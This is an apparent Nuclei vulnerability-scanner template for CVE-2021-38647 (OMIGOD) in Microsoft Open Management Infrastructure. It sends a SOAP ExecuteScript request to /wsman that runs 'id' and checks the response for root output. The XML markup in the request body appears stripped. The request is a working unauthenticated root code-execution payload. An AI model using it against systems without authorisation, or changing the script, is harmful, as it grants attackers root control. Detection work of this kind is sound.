id: CVE-2021-38647 info: name: Microsoft Open Management Infrastructure - Remote Code Execution author: daffainfo,xstp severity: critical description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 epss-score: 0.97203 epss-percentile: 0.99759 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: azure_automation_state_configuration tags: cve,cve2021,rce,omi,microsoft,kev http: - raw: - | POST /wsman HTTP/1.1 Host: {{Hostname}} Content-Type: application/soap+xml;charset=UTF-8 HTTP://{{Hostname}}/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true matchers: - type: word words: - '' - 'uid=0(root) gid=0(root) groups=0' condition: and # digest: 4a0a00473045022100cbfc901c305249c5dbe87b867fea70949bd6cb1737a273c39a88f617f1e9c31b0220545f6f86817a934f310edd5a81d3d6b2ccf1197d191023d915712517db65395b:922c64590222798bb761d5b6d8e72950